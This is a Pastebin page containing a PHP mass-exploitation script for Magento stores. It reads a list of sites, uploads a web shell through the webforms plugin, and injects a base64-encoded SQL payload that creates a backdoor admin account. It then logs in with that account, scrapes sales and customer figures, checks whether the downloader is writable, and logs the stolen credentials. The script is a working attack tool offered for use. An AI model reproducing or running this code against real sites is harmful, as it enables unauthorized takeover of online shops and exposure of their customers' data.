daily pastebin goal
52%
SHARE
TWEET

Magento Mass Xploiter [webforms,add admin]

AgusSR Sep 22nd, 2016 (edited) 3,726 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. error_reporting(0);
  3. set_time_limit(0);
  4.  
  5. function cover() {
  6.     print "[ ========================================== ]\n";
  7.     print "-----> Magento Mass Xploiter <-----\n";
  8.     print "All in One Package: [webforms,add admin] Xploit\n";
  9.     print "Coded by: l0c4lh34rtz ( Mr. Error 404 )\n";
  10.     print "Greetz: IndoXploit - Sanjungan Jiwa\n";
  11.     print "[ ========================================== ]\n\n";
  12. }
  13. function ngcurl($url, $post=null, $http) {
  14.     $ch = curl_init($url);
  15.     if($post != null) {
  16.         curl_setopt($ch, CURLOPT_POST, true);
  17.         curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  18.     }
  19.         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  20.         curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6");
  21.         curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
  22.         curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
  23.         curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  24.         curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  25.         curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  26.         curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
  27.     $result = curl_exec($ch);
  28.     $info = curl_getinfo($ch);
  29.     if($http == "y") {
  30.         return $info['http_code'];
  31.     } else {
  32.         return $result;
  33.     }
  34.         curl_close($ch);
  35. }
  36. function xploit($url, $post) {
  37.     $ch = curl_init();
  38.           curl_setopt($ch, CURLOPT_URL, $url);
  39.           curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6");
  40.           curl_setopt($ch, CURLOPT_TIMEOUT, 60);
  41.           curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  42.           curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  43.           curl_setopt($ch, CURLOPT_POST, 1);
  44.     $headers  = array();
  45.     $headers[] = 'Accept-Encoding: gzip, deflate';
  46.     $headers[] = 'Content-Type: application/x-www-form-urlencoded';
  47.           curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
  48.           curl_setopt($ch, CURLOPT_HEADER, 1);
  49.     return curl_exec($ch);
  50.           curl_close($ch);
  51. }
  52. function ambilKata($param, $kata1, $kata2){
  53.    if(strpos($param, $kata1) === FALSE) return FALSE;
  54.    if(strpos($param, $kata2) === FALSE) return FALSE;
  55.    $start = strpos($param, $kata1) + strlen($kata1);
  56.    $end = strpos($param, $kata2, $start);
  57.    $return = substr($param, $start, $end - $start);
  58.    return $return;
  59. }
  60. function simpan($isi) {
  61.     $f = fopen("idx_magento.txt","a+");
  62.     fwrite($f, $isi);
  63.     fclose($f);
  64. }
  65.  
  66. $shell = "id.php"; // ganti dengan shell kalian.
  67. $sites = explode("\n", file_get_contents($argv[1]));
  68. if(isset($argv[1])) {
  69.     cover();
  70.     foreach($sites as $url) {
  71.         if(!preg_match("/^http:\/\//", $url) AND !preg_match("/^https:\/\//", $url)) {
  72.             $url = "http://$url";
  73.         } else {
  74.             $url = $url;
  75.         }
  76.         // set all var
  77.         $url = "http://".parse_url($url, PHP_URL_HOST);
  78.         preg_match("/Mage.Cookies.path     = '(.*?)';/", ngcurl($url, null, "g"), $mage_path);
  79.         $path = $mage_path[1];
  80.         $url = $url.$path;
  81.         $url_exploit = $url."/index.php/";
  82.         $url_exploit_add_admin = $url_exploit."/admin/Cms_Wysiwyg/directive/index/";
  83.         $url_downloader = $url."/downloader/";
  84.         $url_admin = $url_exploit."/admin/";
  85.         $url_js = $url."/js/webforms/upload/";
  86.         $robots = $url."/robots.txt";
  87.         $log = $url."/result.txt";
  88.         // end all var
  89.         print "[+] URL: $url ";
  90.         // set var all curl page
  91.         $cek_web = ngcurl($url_exploit, null, "g"); // CURL to Index of site
  92.         $cek_downloader = ngcurl($url_downloader, null, "g"); // CURL to Downloader Site
  93.         $cek_admin = ngcurl($url_admin, null, "g"); // CURL to Admin Page
  94.         $cek_webforms = ngcurl($url_js, null, "g");
  95.         $cek_robot = ngcurl($robots, null, "y");
  96.         $cek_log = ngcurl($log, null, "y");
  97.         // end var all curl page
  98.  
  99.         // set all exploit webforms
  100.         $post_js = array("files[]" => "@$shell");
  101.         $exploit_js = ngcurl($url_js, $post_js, "g");
  102.         preg_match('/"url":"(.*?)"/', $exploit_js, $sh);
  103.         $sh[1] = str_replace("\\", "", $sh[1]);
  104.         $cek_shell = ngcurl($sh[1], null, "g");
  105.         // end set all exploit webforms
  106.  
  107.         // set all exploit add admin
  108.         $postdata = 'filter=cG9wdWxhcml0eVtmcm9tXT0wJnBvcHVsYXJpdHlbdG9dPTMmcG9wdWxhcml0eVtmaWVsZF9leHByXT0wKTtTRVQgQFNBTFQgPSAncnAnO1NFVCBAUEFTUyA9IENPTkNBVChNRDUoQ09OQ0FUKCBAU0FMVCAsICdJbmRvWHBsb2l0JykgKSwgQ09OQ0FUKCc6JywgQFNBTFQgKSk7U0VMRUNUIEBFWFRSQSA6PSBNQVgoZXh0cmEpIEZST00gYWRtaW5fdXNlciBXSEVSRSBleHRyYSBJUyBOT1QgTlVMTDtJTlNFUlQgSU5UTyBgYWRtaW5fdXNlcmAgKGBmaXJzdG5hbWVgLCBgbGFzdG5hbWVgLGBlbWFpbGAsYHVzZXJuYW1lYCxgcGFzc3dvcmRgLGBjcmVhdGVkYCxgbG9nbnVtYCxgcmVsb2FkX2FjbF9mbGFnYCxgaXNfYWN0aXZlYCxgZXh0cmFgLGBycF90b2tlbmAsYHJwX3Rva2VuX2NyZWF0ZWRfYXRgKSBWQUxVRVMgKCdpbmRvJywneHBsb2l0JywnbmdhbnVAbmdhbnUuY29tJywnaW5kb3hwbG9pdCcsQFBBU1MsTk9XKCksMCwwLDEsQEVYVFJBLE5VTEwsIE5PVygpKTtJTlNFUlQgSU5UTyBgYWRtaW5fcm9sZWAgKHBhcmVudF9pZCx0cmVlX2xldmVsLHNvcnRfb3JkZXIscm9sZV90eXBlLHVzZXJfaWQscm9sZV9uYW1lKSBWQUxVRVMgKDEsMiwwLCdVJywoU0VMRUNUIHVzZXJfaWQgRlJPTSBhZG1pbl91c2VyIFdIRVJFIHVzZXJuYW1lID0gJ2luZG94cGxvaXQnKSwnRmlyc3RuYW1lJyk7%3D&___directive=e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ&forwarded=1';
  109.         $result = xploit($url_exploit_add_admin, $postdata);
  110.         $ambil = htmlspecialchars(@file_get_contents($url_admin));
  111.         preg_match("/<input name=\"form_key\" type=\"hidden\" value=\"(.*?)\">/", $ambil, $key);
  112.         $post_login = array(
  113.             "form_key" => $key[1],
  114.             "login[username]" => "indoxploit",
  115.             "dummy" => "",
  116.             "login[password]" => "IndoXploit",
  117.         );
  118.         $login_web = ngcurl($url_admin, $post_login, "g");
  119.         preg_match_all('#<span class="price">(.*?)</span>#', $login_web, $matches);
  120.         $links = array_unique($matches[1]);
  121.         preg_match_all('/<span class=\"nowrap\" style=\"font-size:18px; color:#EA7601;\">(.*?)<span/', $login_web, $quality);
  122.         $qual = array_unique($quality[1]);
  123.         $key2 = ambilKata($login_web,"/filesystem/adminhtml_filesystem/index/key/","/");
  124.         $curl_filesystem = ngcurl($url_exploit."/filesystem/adminhtml_filesystem/index/key/$key2/", null, "g");
  125.         $post_downloader = array(
  126.             "username" => "indoxploit",
  127.             "password" => "IndoXploit",
  128.         );
  129.         $curl_downloader = ngcurl($url_downloader, $post_downloader, "g");
  130.         preg_match_all("/<td class=\"first\">(.*?)<\/td>/", $curl_downloader, $pack);
  131.         $key3 = ambilKata($login_web,"/customer/index/key/","/");
  132.         $curl_customer = ngcurl($url_exploit."/admin/customer/index/key/$key3/", null, "g");
  133.         preg_match_all("/<span id=\"customerGrid-total-count\" class=\"no-display\">(.*?)<\/span>/", $curl_customer, $cust);
  134.         // end set all exploit add admin
  135.  
  136.         if(preg_match("/Mage.Cookies.domain/", $cek_web) OR preg_match("/magento/", $cek_downloader) OR preg_match("/magento/", $cek_admin)) {
  137.             print "[Magento]\n";
  138.             print "[ ==================================================== ]\n";
  139.             print "[+] $robots -> ";
  140.             if($cek_robot == 200) {
  141.                 print "Found!\n";
  142.             } else {
  143.                 print "Not Found!\n";
  144.             }
  145.             print "[+] $log -> ";
  146.             if($cek_log == 200) {
  147.                 print "Found!\n";
  148.             } else {
  149.                 print "Not Found!\n";
  150.             }
  151.             print "[ ==================================================== ]\n";
  152.             print "[+] Trying to exploit [Webforms]: ";
  153.             if(preg_match("[]", $cek_webforms) AND !preg_match("/404|Not Found|Error|Forbidden|403/i", $cek_webforms)) {
  154.                 print "Vuln | ";
  155.                 if(preg_match("/{$shell}|webforms/", $exploit_js)) {
  156.                     print "Xploited!\n";
  157.                     if(preg_match("/indoxploit|upload|linux|windows|pass|password/i", $cek_shell) AND !preg_match("/forbidden|404|error|internal server error|500|406/i", $cek_shell)) {
  158.                         print "[+] Shell: ".$sh[1]."\n";
  159.                     } else {
  160.                         print "[+] Shell Error\n";
  161.                     }
  162.                 } else {
  163.                     print "Not Xploited.\n";   
  164.                 }
  165.             } else {
  166.                 print "Not Vuln\n";
  167.             }
  168.             print "[+] Trying to exploit [add admin]: ";
  169.             if(preg_match('#200 OK#', $result)) {
  170.                 print "Xploited! | ";
  171.                 if(preg_match('/Log Out|indoxploit/', $login_web)) {
  172.                     print "[Login: OK]\n";
  173.                     print "[ ====================[ $$$$$$$$ ]==================== ]\n";
  174.                     print "[+] Lifetime Sales: ".$links[0]."\n";
  175.                     print "[+] Average Orders: ".$links[1]."\n";
  176.                     print "[+] Quantity Orders: ".$qual[3][0]."\n";
  177.                     print "[+] Total Customers: ".$cust[1][0]." Customers\n";
  178.                     print "[ ====================[ $$$$$$$$ ]==================== ]\n";
  179.                     print "[ ====================[ /\/\/\/\ ]==================== ]\n";
  180.                     print "[+] Filesystem: ";
  181.                     if(preg_match("/File System/", $curl_filesystem)) {
  182.                         print "Found!\n";
  183.                     } else {
  184.                         print "Not Found.\n";
  185.                     }
  186.                     print "[+] Downloader: ";
  187.                     if(preg_match("/Magento Downloader/", $cek_downloader)) {
  188.                         print "Found! | ";
  189.                         if(preg_match("/Return to Admin|Log Out/i", $curl_downloader)) {
  190.                             if(preg_match("/Your Magento folder does not have sufficient write permissions./", $curl_downloader)) {
  191.                                 $stat_down = "Not Writeable.";
  192.                             } else {
  193.                                 $stat_down = "Writeable";
  194.                             }
  195.                             $in = 0;
  196.                             print "[Login: OK] [$stat_down]\n";
  197.                             //print "[+] Packages installed: \n";
  198.                             foreach($pack[1] as $packages) {
  199.                                 $in++;
  200.                                 //print "-> $packages\n";
  201.                             }
  202.                             print "[+] Installed packages: (".$in.") Packages\n";
  203.                         } else {
  204.                             print "[Login Downloader Failed]\n";
  205.                         }
  206.                     } else {
  207.                         print "[Not Found]\n";
  208.                     }
  209.                     print "[ ====================[ \/\/\/\/ ]==================== ]\n";
  210.                     print "[ ==================================================== ]\n";
  211.                     print "[+] username: indoxploit\n";
  212.                     print "[+] password: IndoXploit\n";
  213.                     print "[+] Login Admin: $url_admin\n";
  214.                     print "[ ==================================================== ]\n\n";
  215.                     simpan("OK -> $url_admin | username: indoxploit | password: IndoXploit\n");
  216.                 } else {
  217.                     print "[Login Admin Failed]\n\n";
  218.                 }
  219.             } else {
  220.                 print "Not Vuln\n\n";
  221.             }
  222.         } else {
  223.             print "[Not Magento]\n\n";
  224.         }
  225.     }
  226. }
  227. ?>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top